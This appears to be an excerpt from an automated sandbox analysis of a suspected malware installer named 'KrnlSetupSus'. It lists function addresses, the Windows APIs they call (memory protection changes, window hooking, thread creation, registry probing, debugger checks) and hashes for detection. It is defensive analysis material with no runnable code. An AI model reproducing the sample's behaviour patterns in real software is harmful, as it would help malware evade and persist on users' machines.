                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                  • Opcode ID: 3b6ea0c9ec3a41bea84a83f99c8ab7fc11bd436f4a9bfc2efbcd1bef4c2adc93
                                                                                                                                  • Instruction ID: 412786bd2a83ae33c30d7b3ab0d009a9ccff6c91b5ccf6a64fb4781a298bf8a8
                                                                                                                                  • Opcode Fuzzy Hash: 3b6ea0c9ec3a41bea84a83f99c8ab7fc11bd436f4a9bfc2efbcd1bef4c2adc93
                                                                                                                                  • Instruction Fuzzy Hash: CDF1E436659B94C6DB60CB5AF49075ABBA1F3C4B98F500116EACE87B68DF7CC484CB10
                                                                                                                                  Function 1C563EE0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 506 1c563ee0-1c563f01 call 1c564130 509 1c563f06-1c563f10 506->509 510 1c563f16-1c563f22 509->510 511 1c563ffa 509->511 513 1c563f44-1c563f6e call 1c573ea0 VirtualQuery 510->513 514 1c563f24-1c563f30 510->514 512 1c563ffc-1c564000 511->512 518 1c563f75-1c563f7d 513->518 519 1c563f70 513->519 514->513 515 1c563f32-1c563f42 514->515 515->509 520 1c563f7f-1c563f88 518->520 521 1c563fdd-1c563ff0 call 1c564130 518->521 519->511 520->521 522 1c563f8a-1c563fb0 VirtualAlloc 520->522 529 1c563ff5 521->529 524 1c563fb2-1c563fb7 522->524 525 1c563fbb-1c563fc5 GetLastError 522->525 524->512 527 1c563fc7-1c563fc9 525->527 528 1c563fcb-1c563fdb 525->528 527->512 528->529 529->509
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$AllocQuery
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 31662377-0
                                                                                                                                  • Opcode ID: 5ba12f6accd07a0eb55bf7dfd9b871ad288432e16da66455f45f403d1a1142ff
                                                                                                                                  • Instruction ID: 48b0f38c848e374eb724ece31695ecaebb1ef0c55f48c826e118977c32d0b96c
                                                                                                                                  • Opcode Fuzzy Hash: 5ba12f6accd07a0eb55bf7dfd9b871ad288432e16da66455f45f403d1a1142ff
                                                                                                                                  • Instruction Fuzzy Hash: 29211032619A94C1DB21CB19E45034BE7B1F3C8B84F500A29F6CD46F69EF7CC2848B14
                                                                                                                                  Function 1C5637EC Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 530 1c5637ec-1c5637f6 531 1c563873-1c563875 530->531 532 1c5637f8-1c56380d GetModuleFileNameW 530->532 535 1c563877 call 1c563be4 531->535 536 1c56387c 531->536 533 1c56386f-1c563871 532->533 534 1c56380f-1c563824 PathFindFileNameW call 1c563d4c 532->534 537 1c563881-1c563888 533->537 534->533 541 1c563826-1c56382d call 1c563c98 534->541 535->536 536->537 541->533 544 1c56382f-1c563836 541->544 544->536 545 1c563838-1c563868 CreateThread call 1c561e38 544->545 547 1c56386d 545->547 547->536
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 1C563805
                                                                                                                                  • PathFindFileNameW.SHLWAPI ref: 1C563814
                                                                                                                                    • Part of subcall function 1C563D4C: StrCmpNIW.SHLWAPI(?,?,?,1C562722), ref: 1C563D64
                                                                                                                                    • Part of subcall function 1C563C98: GetModuleHandleW.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563CA6
                                                                                                                                    • Part of subcall function 1C563C98: GetCurrentProcess.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563CD4
                                                                                                                                    • Part of subcall function 1C563C98: VirtualProtectEx.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563CF6
                                                                                                                                    • Part of subcall function 1C563C98: GetCurrentProcess.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563D11
                                                                                                                                    • Part of subcall function 1C563C98: VirtualProtectEx.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563D32
                                                                                                                                  • CreateThread.KERNEL32 ref: 1C56385B
                                                                                                                                    • Part of subcall function 1C561E38: GetCurrentThread.KERNEL32 ref: 1C561E43
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1683269324-0
                                                                                                                                  • Opcode ID: 8fe4187ffbe2e325f874313ed1639ea6f9221a9ff2286d6fb21bcd5417110a44
                                                                                                                                  • Instruction ID: ac0ca67941d68659c455c4c87654330b0bfe4c78cc259fa5490d8be49b68b4ce
                                                                                                                                  • Opcode Fuzzy Hash: 8fe4187ffbe2e325f874313ed1639ea6f9221a9ff2286d6fb21bcd5417110a44
                                                                                                                                  • Instruction Fuzzy Hash: E101A734A15B5182F7109766E408BDE36B2BB94B88FC04229C40682E62EF7CD0C8C720
                                                                                                                                  Function 1C5652F0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 548 1c5652f0-1c56530a GetCurrentProcess 549 1c56531a-1c565320 548->549 550 1c565322-1c565351 VirtualProtect FlushInstructionCache 549->550 551 1c565353-1c565357 549->551 552 1c56530c-1c565315 550->552 552->549
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 1C5652F4
                                                                                                                                  • VirtualProtect.KERNEL32 ref: 1C565337
                                                                                                                                  • FlushInstructionCache.KERNEL32 ref: 1C56534C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3733156554-0
                                                                                                                                  • Opcode ID: 4aba7460b6388bb063bfeaf383c5b8a18be15a6e4565ce49ea7add9aa0a15a9e
                                                                                                                                  • Instruction ID: 41a38381edba69328d72880e50af7dce0bed47e2be849902a14b09485af5f086
                                                                                                                                  • Opcode Fuzzy Hash: 4aba7460b6388bb063bfeaf383c5b8a18be15a6e4565ce49ea7add9aa0a15a9e
                                                                                                                                  • Instruction Fuzzy Hash: F3F0DA7A229B18C0C620DB11E45074BA7A0F3C8BE8F545116EACD07F28DE78C2848B64
                                                                                                                                  Function 00007FFB4ADFBE21 Relevance: 1.8, APIs: 1, Instructions: 266COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HookWindows
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2559412058-0
                                                                                                                                  • Opcode ID: 76c11d0b30f0e94a4c5c0a6fcd8ab7fd5dde85d61ab92be67f73c5428060264b
                                                                                                                                  • Instruction ID: 1c1d9fe7926684c82ee1faf4d1c47404701e9f52262629013a599eadddee645e
                                                                                                                                  • Opcode Fuzzy Hash: 76c11d0b30f0e94a4c5c0a6fcd8ab7fd5dde85d61ab92be67f73c5428060264b
                                                                                                                                  • Instruction Fuzzy Hash: 6771167190CA5C8FDB59EF68D8456FABBE0EF65321F04427BE009C3292CB656816CB81
                                                                                                                                  Function 00007FFB4ADFB6A9 Relevance: 1.7, APIs: 1, Instructions: 208COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2695349919-0
                                                                                                                                  • Opcode ID: 641da5bcff61a567e12354b0d293d9599ebe25814804cc294ef799e76f5ffc85
                                                                                                                                  • Instruction ID: 35c4a7a41cf77779b99c28161858c188f09d6d3ee99d6c635ffec5f50723df39
                                                                                                                                  • Opcode Fuzzy Hash: 641da5bcff61a567e12354b0d293d9599ebe25814804cc294ef799e76f5ffc85
                                                                                                                                  • Instruction Fuzzy Hash: 3F51257190CB888FD719EF68C8556EABBF0FF55310F0445AEE08AC3192DB28A846C791
                                                                                                                                  Function 1C561BC0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 1C561724: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56172F
                                                                                                                                    • Part of subcall function 1C561724: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56173E
                                                                                                                                    • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5617AE
                                                                                                                                    • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5617DB
                                                                                                                                    • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5617F5
                                                                                                                                    • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561815
                                                                                                                                    • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561830
                                                                                                                                    • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561850
                                                                                                                                    • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56186B
                                                                                                                                    • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56188B
                                                                                                                                    • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5618A6
                                                                                                                                    • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5618C6
                                                                                                                                  • SleepEx.KERNEL32 ref: 1C561BDB
                                                                                                                                    • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5618E1
                                                                                                                                    • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561901
                                                                                                                                    • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56191C
                                                                                                                                    • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56193C
                                                                                                                                    • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561957
                                                                                                                                    • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561977
                                                                                                                                    • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561992
                                                                                                                                    • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56199C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 948135145-0
                                                                                                                                  • Opcode ID: 90453a0d966f37a875fa9fa31a0a9dc9a62d0711adb439b1f5817520d04ee1bf
                                                                                                                                  • Instruction ID: 9f45c5f1cb24319468b66594ac903ac1bc4aeab4a57b4b987dae51970d9a234c
                                                                                                                                  • Opcode Fuzzy Hash: 90453a0d966f37a875fa9fa31a0a9dc9a62d0711adb439b1f5817520d04ee1bf
                                                                                                                                  • Instruction Fuzzy Hash: 3A212C79301A6181FB009BA7DA507BF7365FBA8BC4F115821CE0AA7B54DF24D4948734
                                                                                                                                  Function 1C56F130 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  • Opcode ID: d03a29792b6748d9f8b50c36da3d412cbb8c174d26c0222ae433d454c6783b33
                                                                                                                                  • Instruction ID: 1c82fc42dad0aa3433ebdb077a6760a1f26ddba34ce324f8a61972f4a9234e44
                                                                                                                                  • Opcode Fuzzy Hash: d03a29792b6748d9f8b50c36da3d412cbb8c174d26c0222ae433d454c6783b33
                                                                                                                                  • Instruction Fuzzy Hash: 66D01235731A40C3F300DB12E845BD56329F398701FD04005E94A82694DF7CC2D9CB50

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 1C568270 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32 ref: 1C56828C
                                                                                                                                  • RtlCaptureContext.NTDLL ref: 1C5682B9
                                                                                                                                  • RtlLookupFunctionEntry.NTDLL ref: 1C5682D3
                                                                                                                                  • RtlVirtualUnwind.NTDLL ref: 1C568314
                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 1C568368
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 1C568385
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32 ref: 1C568390
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                  • Opcode ID: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
                                                                                                                                  • Instruction ID: 0285f5810413c0bcb4f0cf3e41e0ac184aea23e29723bb599320d6d960dcbe8d
                                                                                                                                  • Opcode Fuzzy Hash: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
                                                                                                                                  • Instruction Fuzzy Hash: 54311A76215F80CAEB608F61E8807EE7365F784748F84442ADB4E47B58EF78D688C714
                                                                                                                                  Function 1C56CB40 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RtlCaptureContext.NTDLL ref: 1C56CBCB
                                                                                                                                  • RtlLookupFunctionEntry.NTDLL ref: 1C56CBE3
                                                                                                                                  • RtlVirtualUnwind.NTDLL ref: 1C56CC1E
                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 1C56CC57
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 1C56CC61
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32 ref: 1C56CC6C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                  • Opcode ID: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
                                                                                                                                  • Instruction ID: 9a84a5b0ee47d38dbc912028d0fe80f26c9897d739e5381727bb0f66767fd3d9
                                                                                                                                  • Opcode Fuzzy Hash: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
                                                                                                                                  • Instruction Fuzzy Hash: AB416C36614F8086EB60CF35E8407EE73A5F788798F900225EA9D47B68DF38C199CB10
                                                                                                                                  Function 1C56D7D8 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1164774033-0
                                                                                                                                  • Opcode ID: de3a4f1c4722aca2eb904f336336930601643f7c9dfe6b9c18223e648004d9fa
                                                                                                                                  • Instruction ID: 16f32f009cd4c9d182f8157d95b2f7ec034630380a4ac3ad8bbcc7c84e17be29
                                                                                                                                  • Opcode Fuzzy Hash: de3a4f1c4722aca2eb904f336336930601643f7c9dfe6b9c18223e648004d9fa
                                                                                                                                  • Instruction Fuzzy Hash: 89912A327087E189EB10CB76E8843AE7B61E781BA8F544915DE9927F58DE38C0C6C716
                                                                                                                                  Function 1C567E50 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32 ref: 1C567E7C
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1C567E8A
                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 1C567E96
                                                                                                                                  • QueryPerformanceCounter.KERNEL32 ref: 1C567EA6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                  • Opcode ID: f835b8e08e75b66adb0c80a9203c172f2f025c961cbdb54561531f30ab1cb5f4
                                                                                                                                  • Instruction ID: aa9fa997e83ad2c83d7e44df07439b664d8b46dc13157c73e3ca57d35dea4757
                                                                                                                                  • Opcode Fuzzy Hash: f835b8e08e75b66adb0c80a9203c172f2f025c961cbdb54561531f30ab1cb5f4
                                                                                                                                  • Instruction Fuzzy Hash: A2115B32751F418AFB00CF61E8557E833A4F759758F840E21EA6D86BA4DF78D1D88340
                                                                                                                                  Function 1C56D654 Relevance: 1.7, APIs: 1, Instructions: 234COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 1C56CFE0: HeapAlloc.KERNEL32(?,?,00000000,1C56C747), ref: 1C56D035
                                                                                                                                    • Part of subcall function 1C570C78: _invalid_parameter_noinfo.LIBCMT ref: 1C570CAB
                                                                                                                                  • FindFirstFileExW.KERNEL32 ref: 1C56D959
                                                                                                                                    • Part of subcall function 1C56D060: HeapFree.KERNEL32(?,?,?,?,?,?,?,1C56650A), ref: 1C56D076
                                                                                                                                    • Part of subcall function 1C56D060: GetLastError.KERNEL32(?,?,?,?,?,?,?,1C56650A), ref: 1C56D080
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2436724071-0
                                                                                                                                  • Opcode ID: b49c723bd621bb268e7285a2a685c523d1053a6ec233f158c25b1caceae8abcd
                                                                                                                                  • Instruction ID: d61593b68042bb433fca05a784bca0021e4c800542f7c5cba0401ed33d17c777
                                                                                                                                  • Opcode Fuzzy Hash: b49c723bd621bb268e7285a2a685c523d1053a6ec233f158c25b1caceae8abcd
                                                                                                                                  • Instruction Fuzzy Hash: B3810036704BA086EB20CF32E84069AB7A1E785BE4F548A25DFAD47F54DE38D0C6C715
